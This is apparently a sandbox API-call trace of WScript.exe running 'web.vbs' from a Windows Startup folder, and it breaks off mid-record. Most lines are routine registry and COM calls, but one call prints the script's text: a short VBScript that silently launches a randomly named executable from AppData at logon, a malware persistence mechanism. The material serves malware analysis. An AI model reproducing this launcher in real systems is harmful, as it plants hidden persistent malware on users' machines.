dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) [0187.278] GetModuleHandleA (lpModuleName=0x0) returned 0xff3a0000 [0187.278] GetModuleHandleA (lpModuleName=0x0) returned 0xff3a0000 [0187.278] GetVersionExA (in: lpVersionInformation=0x1af7c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x321e50, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1af7c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0187.278] GetUserDefaultLCID () returned 0x409 [0187.279] CoInitialize (pvReserved=0x0) returned 0x0 [0187.352] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\web.vbs\" " [0187.352] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\web.vbs\" ") returned 124 [0187.352] ??2@YAPEAX_K@Z () returned 0x2557b0 [0187.353] ??2@YAPEAX_K@Z () returned 0x42dfa0 [0187.353] GetCurrentThreadId () returned 0x54c [0187.354] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af508 | out: phkResult=0x1af508*=0x7c) returned 0x0 [0187.354] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af500 | out: phkResult=0x1af500*=0x80) returned 0x0 [0187.354] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x1ae808, lpData=0x1aec10, lpcbData=0x1ae800*=0x400 | out: lpType=0x1ae808*=0x0, lpData=0x1aec10*=0x67, lpcbData=0x1ae800*=0x400) returned 0x2 [0187.354] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x1ae808, lpData=0x1aec10, lpcbData=0x1ae800*=0x400 | out: lpType=0x1ae808*=0x0, lpData=0x1aec10*=0x67, lpcbData=0x1ae800*=0x400) returned 0x2 [0187.354] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x1ae808, lpData=0x1aec10, lpcbData=0x1ae800*=0x400 | out: lpType=0x1ae808*=0x0, lpData=0x1aec10*=0x67, lpcbData=0x1ae800*=0x400) returned 0x2 [0187.354] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0187.740] RegCloseKey (hKey=0x80) returned 0x0 [0187.740] RegCloseKey (hKey=0x7c) returned 0x0 [0187.740] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af220 | out: phkResult=0x1af220*=0x7c) returned 0x0 [0187.741] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af218 | out: phkResult=0x1af218*=0x80) returned 0x0 [0187.741] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x1ae528, lpData=0x1ae930, lpcbData=0x1ae520*=0x400 | out: lpType=0x1ae528*=0x0, lpData=0x1ae930*=0x0, lpcbData=0x1ae520*=0x400) returned 0x2 [0187.741] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x1ae528, lpData=0x1ae930, lpcbData=0x1ae520*=0x400 | out: lpType=0x1ae528*=0x0, lpData=0x1ae930*=0x0, lpcbData=0x1ae520*=0x400) returned 0x2 [0187.741] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x1ae528, lpData=0x1ae930, lpcbData=0x1ae520*=0x400 | out: lpType=0x1ae528*=0x0, lpData=0x1ae930*=0x0, lpcbData=0x1ae520*=0x400) returned 0x2 [0187.741] RegCloseKey (hKey=0x80) returned 0x0 [0187.741] RegCloseKey (hKey=0x7c) returned 0x0 [0187.741] GetACP () returned 0x4e4 [0187.741] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77810000 [0187.741] GetProcAddress (hModule=0x77810000, lpProcName="HeapSetInformation") returned 0x7782c4a0 [0187.741] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0187.741] FreeLibrary (hLibModule=0x77810000) returned 1 [0187.741] ??2@YAPEAX_K@Z () returned 0x255f30 [0187.743] CoRegisterMessageFilter (in: lpMessageFilter=0x255f30, lplpMessageFilter=0x255f40 | out: lplpMessageFilter=0x255f40*=0x0) returned 0x0 [0187.743] GetModuleFileNameW (in: hModule=0xff3a0000, lpFilename=0x1af560, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f [0187.743] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x1aeeb0 | out: lpdwHandle=0x1aeeb0) returned 0x704 [0187.744] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x1ae7a0 | out: lpData=0x1ae7a0) returned 1 [0187.744] VerQueryValueW (in: pBlock=0x1ae7a0, lpSubBlock="\\", lplpBuffer=0x1aeeb8, puLen=0x1aeeb4 | out: lplpBuffer=0x1aeeb8*=0x1ae7c8, puLen=0x1aeeb4) returned 1 [0187.744] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1aef08 | out: phkResult=0x1aef08*=0x7c) returned 0x0 [0187.744] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x1ae258, lpData=0x1ae660, lpcbData=0x1ae250*=0x400 | out: lpType=0x1ae258*=0x0, lpData=0x1ae660*=0x0, lpcbData=0x1ae250*=0x400) returned 0x2 [0187.744] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1aeec0 | out: phkResult=0x1aeec0*=0x80) returned 0x0 [0187.744] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x1aee84, lpData=0x1aef00, lpcbData=0x1aee80*=0x4 | out: lpType=0x1aee84*=0x0, lpData=0x1aef00*=0x30, lpcbData=0x1aee80*=0x4) returned 0x2 [0187.744] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x1ae258, lpData=0x1ae660, lpcbData=0x1ae250*=0x400 | out: lpType=0x1ae258*=0x0, lpData=0x1ae660*=0x0, lpcbData=0x1ae250*=0x400) returned 0x2 [0187.744] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x1aee84, lpData=0x1aef00, lpcbData=0x1aee80*=0x4 | out: lpType=0x1aee84*=0x0, lpData=0x1aef00*=0x30, lpcbData=0x1aee80*=0x4) returned 0x2 [0187.744] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x1ae258, lpData=0x1ae660, lpcbData=0x1ae250*=0x400 | out: lpType=0x1ae258*=0x1, lpData="1", lpcbData=0x1ae250*=0x4) returned 0x0 [0187.744] lstrlenW (lpString="1") returned 1 [0187.744] lstrlenW (lpString="0") returned 1 [0187.745] lstrlenW (lpString="1") returned 1 [0187.745] lstrlenW (lpString="no") returned 2 [0187.745] lstrlenW (lpString="1") returned 1 [0187.745] lstrlenW (lpString="false") returned 5 [0187.745] RegCloseKey (hKey=0x80) returned 0x0 [0187.745] RegCloseKey (hKey=0x7c) returned 0x0 [0187.745] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x1aef08, lpdwDisposition=0x0 | out: phkResult=0x1aef08*=0x7c, lpdwDisposition=0x0) returned 0x0 [0187.745] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x1aeea4, lpData=0x1aef00, lpcbData=0x1aeea0*=0x4 | out: lpType=0x1aeea4*=0x0, lpData=0x1aef00*=0x30, lpcbData=0x1aeea0*=0x4) returned 0x2 [0187.745] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x1ae278, lpData=0x1ae680, lpcbData=0x1ae270*=0x400 | out: lpType=0x1ae278*=0x1, lpData="1", lpcbData=0x1ae270*=0x4) returned 0x0 [0187.745] lstrlenW (lpString="1") returned 1 [0187.745] lstrlenW (lpString="0") returned 1 [0187.745] lstrlenW (lpString="1") returned 1 [0187.745] lstrlenW (lpString="no") returned 2 [0187.745] lstrlenW (lpString="1") returned 1 [0187.745] lstrlenW (lpString="false") returned 5 [0187.745] RegCloseKey (hKey=0x7c) returned 0x0 [0187.745] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x1aef08, lpdwDisposition=0x0 | out: phkResult=0x1aef08*=0x7c, lpdwDisposition=0x0) returned 0x0 [0187.745] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x1aeea4, lpData=0x1aef00, lpcbData=0x1aeea0*=0x4 | out: lpType=0x1aeea4*=0x0, lpData=0x1aef00*=0x30, lpcbData=0x1aeea0*=0x4) returned 0x2 [0187.745] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x1ae278, lpData=0x1ae680, lpcbData=0x1ae270*=0x400 | out: lpType=0x1ae278*=0x0, lpData=0x1ae680*=0x31, lpcbData=0x1ae270*=0x400) returned 0x2 [0187.745] RegCloseKey (hKey=0x7c) returned 0x0 [0187.745] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\web.vbs") returned 87 [0187.745] lstrlenW (lpString="vbs") returned 3 [0187.745] lstrlenW (lpString="WSH") returned 3 [0187.746] ??2@YAPEAX_K@Z () returned 0x2558c0 [0187.746] LoadStringW (in: hInstance=0xff3a0000, uID=0x9c5, lpBuffer=0x1ad970, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13 [0187.746] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x1ae9b0*=0x0 | out: pptlib=0x1ae9b0*=0x34d070) returned 0x0 [0187.752] ITypeLib:GetTypeInfoOfGuid (in: This=0x34d070, GUID=0xff3a58f0*(Data1=0x91afbd1b, Data2=0x5feb, Data3=0x43f5, Data4=([0]=0xb0, [1]=0x28, [2]=0xe2, [3]=0xca, [4]=0x96, [5]=0x6, [6]=0x17, [7]=0xec)), ppTInfo=0x1ae998 | out: ppTInfo=0x1ae998*=0x34e448) returned 0x0 [0187.754] ITypeInfo:GetRefTypeOfImplType (in: This=0x34e448, index=0xffffffff, pRefType=0x1ae990 | out: pRefType=0x1ae990*=0xfffffffe) returned 0x0 [0187.754] ITypeInfo:GetRefTypeInfo (in: This=0x34e448, hreftype=0xfffffffe, ppTInfo=0xff3bf458 | out: ppTInfo=0xff3bf458*=0x34e4a0) returned 0x0 [0187.754] IUnknown:Release (This=0x34e448) returned 0x1 [0187.754] ??2@YAPEAX_K@Z () returned 0x255950 [0187.754] ??2@YAPEAX_K@Z () returned 0x255f60 [0187.754] ??2@YAPEAX_K@Z () returned 0x2559f0 [0187.755] ITypeLib:GetTypeInfoOfGuid (in: This=0x34d070, GUID=0xff3a5950*(Data1=0x2cc5a9d0, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x1ae998 | out: ppTInfo=0x1ae998*=0x34e4f8) returned 0x0 [0187.755] ITypeInfo:GetRefTypeOfImplType (in: This=0x34e4f8, index=0xffffffff, pRefType=0x1ae990 | out: pRefType=0x1ae990*=0xfffffffe) returned 0x0 [0187.755] ITypeInfo:GetRefTypeInfo (in: This=0x34e4f8, hreftype=0xfffffffe, ppTInfo=0xff3bf4d8 | out: ppTInfo=0xff3bf4d8*=0x34e550) returned 0x0 [0187.755] IUnknown:Release (This=0x34e4f8) returned 0x1 [0187.755] ITypeLib:GetTypeInfoOfGuid (in: This=0x34d070, GUID=0xff3a5960*(Data1=0xbf64faf0, Data2=0x5906, Data3=0x426c, Data4=([0]=0xb4, [1]=0xbc, [2]=0x7b, [3]=0x75, [4]=0x3c, [5]=0xbe, [6]=0x81, [7]=0x9f)), ppTInfo=0x1ae998 | out: ppTInfo=0x1ae998*=0x34e5a8) returned 0x0 [0187.755] ITypeInfo:GetRefTypeOfImplType (in: This=0x34e5a8, index=0xffffffff, pRefType=0x1ae990 | out: pRefType=0x1ae990*=0xfffffffe) returned 0x0 [0187.755] ITypeInfo:GetRefTypeInfo (in: This=0x34e5a8, hreftype=0xfffffffe, ppTInfo=0xff3bf518 | out: ppTInfo=0xff3bf518*=0x34e600) returned 0x0 [0187.755] IUnknown:Release (This=0x34e5a8) returned 0x1 [0187.755] ITypeLib:GetTypeInfoOfGuid (in: This=0x34d070, GUID=0xff3a5910*(Data1=0x2cc5a9d1, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x1ae998 | out: ppTInfo=0x1ae998*=0x34e658) returned 0x0 [0187.755] ITypeInfo:GetRefTypeOfImplType (in: This=0x34e658, index=0xffffffff, pRefType=0x1ae990 | out: pRefType=0x1ae990*=0xfffffffe) returned 0x0 [0187.755] ITypeInfo:GetRefTypeInfo (in: This=0x34e658, hreftype=0xfffffffe, ppTInfo=0xff3bf498 | out: ppTInfo=0xff3bf498*=0x34e6b0) returned 0x0 [0187.755] IUnknown:Release (This=0x34e658) returned 0x1 [0187.755] IUnknown:Release (This=0x34d070) returned 0x4 [0187.755] ??2@YAPEAX_K@Z () returned 0x255a50 [0187.755] GetCurrentThreadId () returned 0x54c [0187.755] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc [0187.755] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff3b1cf8, lpParameter=0x255a50, dwCreationFlags=0x0, lpThreadId=0x255a78 | out: lpThreadId=0x255a78*=0x598) returned 0xd4 [0187.756] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x1aebf0*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0 [0187.785] CloseHandle (hObject=0xcc) returned 1 [0187.785] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\web.vbs", nBufferLength=0x104, lpBuffer=0x1aec80, lpFilePart=0x1aec70 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\web.vbs", lpFilePart=0x1aec70*="web.vbs") returned 0x57 [0187.785] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".vbs", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ae190 | out: phkResult=0x1ae190*=0xe6) returned 0x0 [0187.786] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x1ae140, lpData=0x1ae1a0, lpcbData=0x1ae144*=0x800 | out: lpType=0x1ae140*=0x1, lpData="VBSFile", lpcbData=0x1ae144*=0x10) returned 0x0 [0187.786] RegCloseKey (hKey=0xe6) returned 0x0 [0187.786] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="VBSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ae190 | out: phkResult=0x1ae190*=0xe6) returned 0x0 [0187.786] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x1ae140, lpData=0x1aea10, lpcbData=0x1ae144*=0x200 | out: lpType=0x1ae140*=0x1, lpData="VBScript", lpcbData=0x1ae144*=0x12) returned 0x0 [0187.786] RegCloseKey (hKey=0xe6) returned 0x0 [0187.786] ??2@YAPEAX_K@Z () returned 0x2563c0 [0187.786] GetProcessHeap () returned 0x320000 [0187.786] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x2000) returned 0x358390 [0187.786] CLSIDFromString (in: lpsz="VBScript", pclsid=0x1ae988 | out: pclsid=0x1ae988*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0 [0187.787] CoCreateInstance (in: rclsid=0x1ae988*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xff3a1800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ae980 | out: ppv=0x1ae980*=0x2566f0) returned 0x0 [0188.744] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1acb80 | out: lpSystemTimeAsFileTime=0x1acb80*(dwLowDateTime=0xd0973960, dwHighDateTime=0x1d66ab6)) [0188.744] GetCurrentProcessId () returned 0x548 [0188.744] GetCurrentThreadId () returned 0x54c [0188.744] GetTickCount () returned 0x112fbfc [0188.744] QueryPerformanceCounter (in: lpPerformanceCount=0x1acb88 | out: lpPerformanceCount=0x1acb88*=6516710112) returned 1 [0188.744] malloc (_Size=0x100) returned 0x256580 [0188.745] __dllonexit () returned 0x7fef803bfc0 [0188.745] __dllonexit () returned 0x7fef803bfa8 [0188.767] __dllonexit () returned 0x7fef803bfd4 [0189.430] GetUserDefaultLCID () returned 0x409 [0189.430] GetVersion () returned 0x1db10106 [0189.772] ??2@YAPEAX_K@Z () returned 0x256690 [0189.772] ??2@YAPEAX_K@Z () returned 0x2566f0 [0190.131] GetUserDefaultLCID () returned 0x409 [0190.131] GetACP () returned 0x4e4 [0190.131] ??3@YAXPEAX@Z () returned 0x56f7e301 [0190.132] GetCurrentThreadId () returned 0x54c [0190.132] ??2@YAPEAX_K@Z () returned 0x256a80 [0190.132] GetCurrentThreadId () returned 0x54c [0190.132] ??2@YAPEAX_K@Z () returned 0x255a90 [0190.132] ??2@YAPEAX_K@Z () returned 0x256690 [0190.132] ??2@YAPEAX_K@Z () returned 0x256b60 [0190.132] ??2@YAPEAX_K@Z () returned 0x256c30 [0190.132] GetCurrentThreadId () returned 0x54c [0190.132] ??2@YAPEAX_K@Z () returned 0x256c70 [0190.132] GetUserDefaultLCID () returned 0x409 [0190.132] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0190.132] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x1ae8e0, cchData=6 | out: lpLCData="1252") returned 5 [0190.132] IsValidCodePage (CodePage=0x4e4) returned 1 [0190.132] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7feffa60000 [0190.188] GetProcAddress (hModule=0x7feffa60000, lpProcName="CoCreateInstance") returned 0x7feffa87490 [0190.188] CoCreateInstance (in: rclsid=0x7fef808d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef808d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x256a38 | out: ppv=0x256a38*=0x3572c0) returned 0x0 [0190.188] IUnknown:AddRef (This=0x3572c0) returned 0x2 [0190.188] GetCurrentProcessId () returned 0x548 [0190.188] GetCurrentThreadId () returned 0x54c [0190.188] GetTickCount () returned 0x1130197 [0190.188] ISystemDebugEventFire:BeginSession (This=0x3572c0, guidSourceID=0x7fef808d5d8, strSessionName="VBScript:00001352:00001356:18022807") returned 0x0 [0190.189] GetCurrentThreadId () returned 0x54c [0190.189] ??2@YAPEAX_K@Z () returned 0x256d00 [0190.189] ??2@YAPEAX_K@Z () returned 0x256d50 [0190.189] malloc (_Size=0x80) returned 0x256e50 [0190.189] malloc (_Size=0x108) returned 0x256ee0 [0190.189] GetCurrentThreadId () returned 0x54c [0190.189] ??2@YAPEAX_K@Z () returned 0x256ff0 [0190.189] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\web.vbs" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\web.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x100 [0190.189] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x83 [0190.189] CreateFileMappingA (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x83, lpName=0x0) returned 0x104 [0190.189] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x210000 [0190.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x210000, cbMultiByte=131, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 131 [0190.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x210000, cbMultiByte=131, lpWideCharStr=0x35f4d8, cchWideChar=131 | out: lpWideCharStr="SeT FPYAuAq = CreateobjecT(\"wscrIPT.SHeLl\")\r\nFPYAuaq.Run \"\"\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\"\"\", 0, False") returned 131 [0190.190] UnmapViewOfFile (lpBaseAddress=0x210000) returned 1 [0190.190] CloseHandle (hObject=0x104) returned 1 [0190.190] CloseHandle (hObject=0x100) returned 1 [0190.190] GetSystemDirectoryA (in: lpBuffer=0x1aeb08, uSize=0x0 | out: lpBuffer="Lï\x1a") returned 0x14 [0190.190] ??2@YAPEAX_K@Z () returned 0x257040 [0190.190] GetSystemDirectoryA (in: lpBuffer=0x257040, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0190.190] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefe580000 [0190.191] ??3@YAXPEAX@Z () returned 0x56f7e301 [0190.191] GetProcAddress (hModule=0x7fefe580000, lpProcName="SaferIdentifyLevel") returned 0x7fefe59e470 [0190.191] GetProcAddress (hModule=0x7fefe580000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefe59f9b0 [0190.191] GetProcAddress (hModule=0x7fefe580000, lpProcName="SaferCloseLevel") returned 0x7fefe59f660 [0190.191] IdentifyCodeAuthzLevelW () returned 0x1 [0192.520] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1adc80 | out: lpSystemTimeAsFileTime=0x1adc80*(dwLowDateTime=0xd23c8cc0, dwHighDateTime=0x1d66ab6)) [0192.520] GetCurrentProcessId () returned 0x548 [0192.520] GetCurrentThreadId () returned 0x54c [0192.520] GetTickCount () returned 0x11306c5 [0192.520] QueryPerformanceCounter (in: lpPerformanceCount=0x1adc88 | out: lpPerformanceCount=0x1adc88*=6894335774) returned 1 [0192.521] malloc (_Size=0x100) returned 0x257ac0 [0192.521] GetVersionExA (in: lpVersionInformation=0x1ada60*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfafaf810, dwBuildNumber=0x7fe, dwPlatformId=0xfafa0000, szCSDVersion="þ\x07") | out: lpVersionInformation=0x1ada60*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0192.521] GetUserDefaultLCID () returned 0x409 [0192.521] IsFileSupportedName () returned 0x1 [0192.521] _wcsicmp (_String1=".vbs", _String2=".vbs") returned 0 [0192.525] GetSignedDataMsg () returned 0x0 [0192.525] GetCurrentProcess () returned 0xffffffffffffffff [0192.526] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x104, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1ae2c0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1ae2c0*=0x130) returned 1 [0192.526] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x83 [0192.526] ??2@YAPEAX_K@Z () returned 0x25a060 [0192.526] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.526] ReadFile (in: hFile=0x130, lpBuffer=0x25a060, nNumberOfBytesToRead=0x83, lpNumberOfBytesRead=0x1ae2a0, lpOverlapped=0x0 | out: lpBuffer=0x25a060*, lpNumberOfBytesRead=0x1ae2a0*=0x83, lpOverlapped=0x0) returned 1 [0192.526] CoInitialize (pvReserved=0x0) returned 0x1 [0192.526] CoCreateInstance (in: rclsid=0x7fefafaf850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fefafaf860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x1ae210 | out: ppv=0x1ae210*=0x25a500) returned 0x0 [0194.472] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ac410 | out: lpSystemTimeAsFileTime=0x1ac410*(dwLowDateTime=0xd349edb0, dwHighDateTime=0x1d66ab6)) [0194.473] GetCurrentProcessId () returned 0x548 [0194.473] GetCurrentThreadId () returned 0x54c [0194.473] GetTickCount () returned 0x1130db7 [0194.473] QueryPerformanceCounter (in: lpPerformanceCount=0x1ac418 | out: lpPerformanceCount=0x1ac418*=7089564233) returned 1 [0194.473] malloc (_Size=0x100) returned 0x257bd0 [0194.473] __dllonexit () returned 0x7fef70b14c0 [0194.473] __dllonexit () returned 0x7fef70b14e8 [0194.473] GetVersionExA (in: lpVersionInformation=0x1ac1f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xf70b2dc9, dwBuildNumber=0x7fe, dwPlatformId=0xf70b14e8, szCSDVersion="þ\x07") | out: lpVersionInformation=0x1ac1f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0194.473] GetProcessWindowStation () returned 0x30 [0194.473] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x1ac1d8, nLength=0xc, lpnLengthNeeded=0x1ac1d0 | out: pvInfo=0x1ac1d8, lpnLengthNeeded=0x1ac1d0) returned 1 [0194.473] ??2@YAPEAX_K@Z () returned 0x25a0f0 [0194.474] ??2@YAPEAX_K@Z () returned 0x25a140 [0194.474] ??2@YAPEAX_K@Z () returned 0x25a170 [0194.474] ??2@YAPEAX_K@Z () returned 0x25a1b0 [0194.474] ??2@YAPEAX_K@Z () returned 0x25a1f0 [0194.474] ??2@YAPEAX_K@Z () returned 0x25a230 [0194.474] ??2@YAPEAX_K@Z () returned 0x25a270 [0194.474] 